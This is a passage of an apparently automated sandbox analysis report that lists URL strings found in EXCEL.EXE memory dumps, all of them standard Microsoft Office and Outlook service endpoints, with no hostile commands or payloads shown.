    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://cr.office.com
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/0
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com0-
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comsyz
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies#
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortak
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://dev.cortana.ai
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/hP
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://devnull.onenote.com
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comed
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://directory.services.
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/#
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v12
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/yT
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmln
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/Url$
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
